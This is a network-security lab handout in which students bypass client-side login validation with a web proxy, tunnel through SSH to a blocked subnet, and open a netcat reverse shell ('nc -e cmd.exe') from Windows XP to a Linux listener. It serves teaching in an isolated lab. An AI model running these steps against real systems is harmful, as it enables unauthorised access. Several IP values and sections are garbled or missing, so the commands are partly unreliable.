





Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
A lab exercise focused on web and internet-based attacks, including using @stake webproxy for monitoring web traffic, performing a denial of service (dos) attack on ssl, and gaining remote shell access using netcat. Students will learn about ssl interactions with tcp, ssh tunneling, and protecting against ssh tunneling.
Typology: Lab Reports
1 / 9
This page cannot be seen from the preview
Don't miss anything!






Group Number: _________ Member Names: ___________________ _______________________ Date Assigned: Date Due: Last Edited: Lab Authored By: Cambiz Mura and David Eakes
the theory and practical level.
Web traffic, how to perform a DoS on over SSL, how to use SSH tunneling to access normally denied services on another subnet, and gaining remote shell access using netcat. Some of this lab is more theory-based, so there will be questions about that.
Red Hat Enterprise 4 WS VMWare with 3 - Red Hat 7.2 images and 1 – Windows XP image @stake WebProxy NetCat for both Linux and Windows XP Apache server on Red Hat 4.0 host machine
Copy the @stake WebProxy installer from the NAS server to your desktop and run the Installation program. Open Internet Explorer:
Unzip the contents of js_validation.zip file to the html directory where Apache is running on your RedHat 4.0 host machine (NOTE: Apache should have been installed in a prior lab).
Client side validation using javascript is very common in web applications and web sites. However, it is not a solution to all the potential threats that may exist. Security professionals must take many precautions to ensure that would be attackers do not find easy ways around a poorly implemented security scheme.
Open up Internet Explorer and enter 57.35.6.x/login.html in the URL field, where 57.35.6.x is the IP of the RedHat 7.2 machine that is running Apache (57.35.6.x). Question 1.1 Enter any username and password combination and see, what happens? Why? Start @stake WebProxy by going to Start->Programs->webproxy and click on @stake WebProxy. Again, try to login to the site (57.35.6.x/login.html ), but now enter username: Henry and password: password. Of course you could login if you are a valid user! But what if you are not? Now open IE and enter http://webproxy in the URL field. @stake WebProxy comes with an easy-to-use interface that allows for much functionality. Click on the “RequestCache” tab. Now click on the “Show Cache” button. Screenshot #1 - Take a screen capture of the WebProxy RequestCache page. You should see the URL for the RedHat 4.0 machine, directed to the login.html page. Now click on the RequestEditor tab. Click on the page that includes the parameters for the submission of username and password. Enter whatever you wish in for these fields (it doesn’t matter) and see what happens. Cool huh? Question 1.2 Why were you able to login? Can this tool be used in conjuction with common SQL injection attacks? How? Question 1.3 What are some ways that web developers can incorporate more secure practices to prevent such attacks?
Before starting the machines, go to the console of 7.2A and edit its settings. Add another Ethernet port. This port will get the name eth1.
Start all 3 RedHat7.2 virtual machines. You will now create 2 subnets. After they’re booted and logged in, go into 7.2A. Set 7.2A: eth0’s IP to 57.35.6.x+1 where x is your assigned IP number. Set 7.2A: eth1’s IP to 10.0.1.x+ Go to 7.2B. Set 7.2B: eth0’s IP to 57.35.6.x+ Set 7.2B default gateway to 57.35.6.x+ Go to 7.2C. Set 7.2C: eth0’s IP to 10.0.1.x+ Set 7.2C default gateway to 10.0.1.x+ 7.2A is now a router, 7.2B is in Subnet 1, and 7.2C is in Subnet 2. In 7.2A stop all services but sshd. In 7.2B make sure httpd is started, and create a simple webpage and put it in www. Name it webpage.html You will attempt to tunnel a connection from 7.2C to 7.2B. First try to access your webpage by opening a browser and attempt to connect to http://57.35.6.x+2/. If you set it up right, this should fail. Now, let’s try to access the webpage via SSH from 7.2C to 7.2B. In 7.2B: # ssh -l root -L 80:10.0.1.x+1:22 57.35.6.x+1 cat - In 7.2C: **# ssh -l root -L 7777:57.35.6.x+2:22 10.0.1.x+1 cat -
Screenshot #3: Take a screenshot of your outcome. This implies that someone on the other end has allowed you into the protected subnet. Possibly consider trying to input the command in 7.2B from a connection from 7.2C once you’ve derived its password (which would be user:root password:password). Imagine how if someone’s password is compromised, this could be used to access a machine behind a protected firewall.
Question 3.1: How would you protect against SSH tunneling to compromise firewalls? Question 3.2: What other applications to SSH tunneling are there?
This section was inspired by Hacking by Numbers – Bootcamp Practice 08 from 2005. http://www.blackhat.com/html/bh-usa-06/train-bh-us-06-sp-b.html
You will need a Red Hat 7.2 virtual machine and a Windows XP virtual machine. Make sure nc.exe and class_uniload.exe are on your Desktop in Windows XP. Also, you will be using @stake WebProxy again. Your IP addresses are as follows: Red Hat 7.2: 57.35.6. x + Windows XP: 57.35.6. x + x represents your group’s IP root.
Open a terminal in Red Hat 7.2 and type this command: # nc -lvn -p 7777 This sets netcat into listening (-l) mode. (-p specifies the port. I happen to like 7777, so that’s what I’ll use. -v means verbose mode. -n means don’t attempt a DNS lookup) Now, on your WinXP machine, open a command line, cd to the Desktop where you have nc.exe and type this command: # nc -vn 57.35.6. x +1 7777 This connects to the netcat session on your Red Hat machine. If nothing fails, you get an output that says you’ve made a connection and both processes appear to wait, everything has gone normally and you’re ready to proceed. Kill both running netcats with Ctrl-C.
Back in your terminal in Red Hat 4, type this command: # nc -lvn -p 7777 Red Hat is now listening. You will now attack Windows using netcat on Windows with this command: # nc -vn -e cmd.exe 57.35.6. x +1 7777 Take a look at your Red Hat 7.2 machine. If you did it properly, you should have a Windows XP command prompt in Linux! You now have all the privileges of the user you were logged in as on Windows. Screenshot #4: Take a screenshot of your terminal in Red Hat 7.2.
The following material copied and modified from Lab 1. Note: In this section you may need to hit control and alt keys at the same time to release your mouse from Vmware. Now you will be installing virtual machines on your host machine. One of the ways of doing this is to create a new virtual machine in VMware and then installing the OS on it, just as you would on a normal machine. If you already have one of these machines, you can make another machine from it by just copying the right directories. This cuts the installation time by a huge amount. You can copy both images at the same time in two different terminal windows. Copies of the virtual machines, created by the TAs, are available on the NAS server. You will be creating virtual machines out of them. Follow the steps below to do this. Make sure you have a vmware folder in root. If not, create a vmware directory by using the command # mkdir /root/vmware For this lab, you need 3 Red Hat 7.2 images. For this use the command # mkdir /root/vmware/RedHat7.2- x where x is a number Copy the “ /mnt/nas4112/VMWare/RedHat7.2 ” directory to your “ /root/vmware / RedHat7.2- x” directory by using the command # cp -r /mnt/nas4112/VMWare/RedHat7.2 /root/Desktop/RedHat7.2- x Type ‘ vmware & ’ in a terminal window to start VMWare. The '&' sign allows a process to run in the background, leaving the terminal open for use. Follow the steps below to create a RedHat 7.2 virtual machine Select File->New->New Virtual machine to create a new virtual machine Choose Custom machine and click Next Select legacy since these images were created with an older version of VMware and click Next Select Linux for operating system and click Next Change the name of the machine to RedHat7.2- x and set the directory to /root/vmware/RedHat7.2- x /RedHat7. You will be warned now that you already have a machine at that location, answer yes (this is what we just copied to there) Leave the virtual memory setting as it is. If it gives you problems, you can increase or decrease the amount of memory for each machine, later. Then click Next. Select Bridged networking and click next. On the I/O adapter screen just click next Choose “Use an existing virtual disk” and click Next. Click Browse, go into the /root/vmware/RedHat7.2- x /RedHat7.2 directory and choose the file called “RedHat7.2.vmdk” Click Finish. This will create a RedHat 7.2 virtual machine.
For Internet Explorer: